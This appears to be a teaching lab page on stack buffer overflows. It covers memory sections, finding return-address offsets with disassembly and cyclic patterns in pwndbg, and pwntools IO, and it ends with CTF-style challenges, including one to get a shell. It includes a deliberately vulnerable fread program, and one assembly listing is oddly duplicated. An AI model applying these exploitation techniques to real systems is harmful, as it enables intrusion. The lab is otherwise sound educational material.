Buffer Exploitation

Pwntools

In this lab we will be using the pwntools python module to solve the tasks. Check out the Pwntools Tutorial section.

Buffers

A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. In C, we can declare a buffer of bytes as a char array, as follows:

char local_buffer[32];

Which results in the following assembly code:

push   rbp
mov    rbp,rsp
sub    rsp,0x20
...
ret

Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (sub rsp, 0x20). This simply reserves space on the stack (remember that on x86 the stack grows “upwards”, from higher addresses to lower ones).

A compiler may allocate more space on the stack than explicitly required due to alignment constraints or other hidden values. To exploit a program, the C source code may not be a good enough reference point for stack offsets. Only disassembling the executable will provide relevant information.

Buffers can be also be stored in other places in memory, such as the heap, .bss, .data or .rodata.

Analyze and compile the following snippet (also present in the lab files, go to 00-tutorial and run make buffers):

#include <stdio.h>
#include <stdlib.h>

char g_buf_init_zero[32] = {0};
/* g_buf_init_vals[5..31] will be 0 */
char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
const char g_buf_const[32] = "Hello, world\n";

int main(void)
{
    char l_buf[32];
    static char s_l_buf[32];
    char *heap_buf = malloc(32);

    free(heap_buf);

    return 0;
}

Check the common binary sections and symbols. Use the usual commands (readelf -S, nm). Observe in which section each variable is located and the section flags.

$ readelf -S buffers
...
  [16] .rodata           PROGBITS         <b>0000000000402000</b>  00002000
       0000000000000040  0000000000000000   <b>A</b>       0     0     32
...
  [24] .data             PROGBITS         <b>0000000000404040</b>  00003040
       0000000000000040  0000000000000000  <b>WA</b>       0     0     32
  [25] .bss              NOBITS           <b>0000000000404080</b>  00003080
       0000000000000060  0000000000000000  <b>WA</b>       0     0     32
...
Key to Flags:
  W (write), A (alloc), X (execute)

$ nm buffers
...
<b>0000000000402020 R</b> g_buf_const
<b>0000000000404060 D</b> g_buf_init_vals
<b>00000000004040a0 B</b> g_buf_init_zero

Key to Flags:
  R (symbol is read-only)
  D (symbol in initialized data section)
  B (symbol in BSS data section)

  A lowercase flag means variable is not visible local (not visible outside the object)

You can also inspect these programmatically using pwntools and the ELF class:

from pwn import *

elf = ELF('buffers')

bss    = elf.get_section_by_name('.bss')
data   = elf.get_section_by_name('.data')
rodata = elf.get_section_by_name('.rodata')

bss_addr    = bss['sh_addr']
data_addr   = data['sh_addr']
rodata_addr = rodata['sh_addr']

bss_size = bss['sh_size']
data_size = data['sh_size']
rodata_size = rodata['sh_size']

# A (Alloc) = 1 << 1 = 2
# W (Write) = 1 << 0 = 1
bss_flags    = bss['sh_flags']
data_flags   = data['sh_flags']
rodata_flags = rodata['sh_flags']

print("Section info:")
print(".bss:    0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr+bss_size, bss_flags))
print(".data:   0x{:08x}-0x{:08x}, {}".format(data_addr, data_addr+data_size, data_flags))
print(".rodata: 0x{:08x}-0x{:08x}, {}".format(rodata_addr, rodata_addr+rodata_size, rodata_flags))

print()

print("Variable info:")
print("g_buf_init_zero: 0x{:08x}".format(elf.symbols.g_buf_init_zero))
print("g_buf_init_vals: 0x{:08x}".format(elf.symbols.g_buf_init_vals))
print("g_buf_const:     0x{:08x}".format(elf.symbols.g_buf_const))

Another handy utility is the vmmap command in pwndbg which shows all memory maps of the process at runtime:

pwndbg> b main
pwngdb> run
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
          0x400000           0x401000 r--p     1000 0      /home/user/buffers
          0x401000           0x402000 r-xp     1000 1000   /home/user/buffers
          0x402000           0x403000 r--p     1000 2000   /home/user/buffers
          0x403000           0x404000 r--p     1000 2000   /home/user/buffers
          0x404000           0x405000 rw-p     1000 3000   /home/user/buffers
    0x7ffff7dc9000     0x7ffff7dcb000 rw-p     2000 0
...
    0x7ffffffdd000     0x7ffffffff000 rw-p    22000 0      [stack]
0xffffffffff600000 0xffffffffff601000 --xp     1000 0      [vsyscall]

Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap in a function scope). The symbol names aren't found anywhere in the binary, except if debug symbols are enabled (-g flag).

Stack Buffer Overflow

Stack Overflow

Note that this is the stack for a 64bit system and the first couple of function arguments are stored in registers (rdi, rsi, rdx, rcx, r8, and r9) and that's why the images has arg_6 as the first argument.

We should know by now that the stack serves multiple purposes:

Passing function arguments from the caller to the callee
Storing local variables for functions
Temporarily saving register values before a call
Saving the return address and old frame pointer

Even though, in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. To avoid this, most high level languages use size metadata and bound checks to detect out of bounds accesses to the memory.

But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using safe functions. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.

Buffer Size and Offset Identification

When trying to overflow a buffer on the stack we need to know the size and where the buffer is in memory relative to the saved return address (or some other control flow altering value/pointer).

Static Analysis

One way, for simple programs, you can do static analysis and check some key points in the disassembled code.

For example, this simple program (00-tutorial/simple_read, run make simple_read to compile):

#include <stdio.h>

int main(void) {
    char buf[128];
    fread(buf, 1, 256, stdin);
    return 0;
}

generates the following assembly code:

push   rbp
mov    rbp,rsp
sub    rsp,0x90
mov    rax,QWORD PTR fs:0x28

mov    QWORD PTR [rbp-0x8],rax
xor    eax,eax
# important bit
mov    rdx,QWORD PTR [rip+0x2ed6]        # 4040 <stdin@@GLIBC_2.2.5>
lea    rax,[rbp-0x90]                    # <- stack buffer starts at rbp-0x90
mov    rcx,rdx                           # <- 4th argument fo fread, stdin
mov    edx,0x100                         # <- 3rd argument of fread, number of elements read
mov    esi,0x1                           # <- 2nd argument of fread, size of element
mov    rdi,rax                           # <- 1st argument of fread (buffer address saved in RAX)
call   1030 <fread@plt>

push   rbp
mov    rbp,rsp
add    rsp,0xffffffffffffff80
# --- important bit ---
mov    rdx,QWORD PTR [rip+0x2efb]        # 404030 <stdin@@GLIBC_2.2.5>
lea    rax,[rbp-0x80]  # <- stack buffer starts at rbp-0x80
mov    rcx,rdx         # <- 4th argument fo fread, stdin
mov    edx,0x100       # <- 3rd argument of fread, number of elements read
mov    esi,0x1         # <- 2nd argument of fread, size of element
mov    rdi,rax         # <- 1st argument of fread (buffer address saved in RAX)
call   401030 <fread@plt>
# ---------------------
mov    eax,0x0
leave
ret

Looking at the fread arguments we can see the buffer start relative to RBP and the number of bytes read. RBP-0x80+0x100*0x1 = RBP+0x80, so the fread function can read 128 bytes after RBP -> return address stored at 136 bytes after RBP.

Stack Buffer

Dynamic Analysis

You can determine offsets at runtime in a more automated way with pwndbg using an De Bruijn sequences which produces strings where every substring of length N appears only once in the sequence; in our case it helps us identify the offset of an exploitable memory value relative to the buffer.

For a simple buffer overflow the workflow is:

generate an long enough sequence to guarantee a buffer overflow
feed the generated sequence to the input function in the program
the program will produce a segmentation fault when reaching the invalid return address on the stack
search the offset of the faulty address in the generated pattern to get an offset

In pwndbg this works as such:

pwndbg> cyclic -n 8 256
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab
pwndbg> run
...
pwndbg>
<reading input, paste the generated pattern>
...
pwndbg> continue
...
Program received signal SIGSEGV, Segmentation fault
...
   0x401141 <main+27>    mov    esi, 1
   0x401146 <main+32>    mov    rdi, rax
   0x401149 <main+35>    call   fread@plt <fread@plt

   0x40114e <main+40>    mov    eax, 0
   0x401153 <main+45>    leave
 ► 0x401154 <main+46>    ret    <0x6161616161616172>
...
pwndbg> cyclic -n 8 -c 64 -l 0x6161616161616172
136

Note: We get the same 136 offset computed manually with the static analysis method.

Input-Output Functions

Most programs aren't a straight forward single input buffer overflow so we need to deal with things like:

automating program input-output - by programmatically sending and receiving data
parsing program output - to use potential leaked information
understand the mechanics of the IO methods used - what kind of data they accept and possible constraints

pwntools offers a large area of IO functions to communicate with a program (either local or remote). The basic and usual ones are:

send(data) - sends the data byte string to the process
sendline(data) - shorthand for send(data + b"\n")
recv(num) - receives num bytes from the process
recvline() - receives a whole line from the process (until '\n')
recvuntil(str) - receives data until str is found (will not contain str)
recvall() - receives the full program output (until EOF)

Check the documentation for more complex IO functions that might come in handy (like recvregex, sendafter).

It is also important to understand the functionality of the different IO functions the program itself uses. For C programs, in our case, you can always find useful information in the man pages of specific functions:

size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream): Reads nmemb items of data, each size bytes long, simple and straightforward.
char *gets(char *s): Reads until either a terminating newline or EOF, which it replaces with a null byte ('\0'). The problem here is that you won't be able to have a newline in the middle of your payload; note that it doesn't have a size argument to it will read indefinitely as long as it doesn't reach a newline or EOF.
char *fgets(char *s, int size, FILE *stream): Reads in at most one less than size characters from stream and stores them into the buffer pointed to by s. Reading stops after an EOF or a newline. If a newline is read, it is stored into the buffer. A terminating null byte ('\0') is stored after the last character in the buffer. This one adds the size limit argument, but also note that it stores the newline in the string and adds the null byte after (in contrast to gets)
int scanf(const char *format, ...): As opposed the other functions scanf reads text based on the format string and parses it Don't do the common mistake of sending binary data to scanf, for example "%d" expects a string representation of a number like "16", not the binary data like "\x00\x00\x00\x10"

Every time you encounter a new input function check the documentation to find it's limitations

Challenges

01. Challenge: Parrot

Some programs feature a stack smashing protection in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the “canary” can conclude that stack data has been corrupted throughout the execution of the current function.

We have implemented our very own parrot. Can you avoid it somehow?

02. Challenge: Indexing

More complex programs require some form of protocol or user interaction. This is where pwntools shines. Here's an interactive script to get you started:

    #!/usr/bin/env python
    from pwn import *

    p = process('./indexing')

    p.recvuntil('Index: ')
    p.sendline() # TODO (must be string)

    # Give value
    p.recvuntil('Value: ')
    p.sendline() # TODO (must be string)
    p.interactive()

Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.

03. Challenge: `smashthestack` `Level7`

Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.

Hints:

There's an integer overflow + buffer overflow in the program.
How does integer multiplication work at a low level? Can you get a positive number by multiplying a negative number by 4?
To pass command-line arguments in gdb use run arg1 arg2 ... or set args arg1 arg2 ... before a run command
In pwntools you can pass a list to process (process(['./level07', arg1, arg2])

04. Challenge: Neighbourly

Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.

05. Challenge: Input Functions

On the same idea as the "Indexing" challenge but much harder. Carefully check what input functions are used and parse the input accordingly.

06. Challenge: Bonus: Birds

Time for a more complex challenge. Be patient and don't speed through it.

Buffer Exploitation

Pwntools​

Buffers​

Stack Buffer Overflow​

Buffer Size and Offset Identification​

Static Analysis​

Dynamic Analysis​

Input-Output Functions​

Challenges​

01. Challenge: Parrot​

02. Challenge: Indexing​

03. Challenge: smashthestack Level7​

04. Challenge: Neighbourly​

05. Challenge: Input Functions​

06. Challenge: Bonus: Birds​

Further Reading​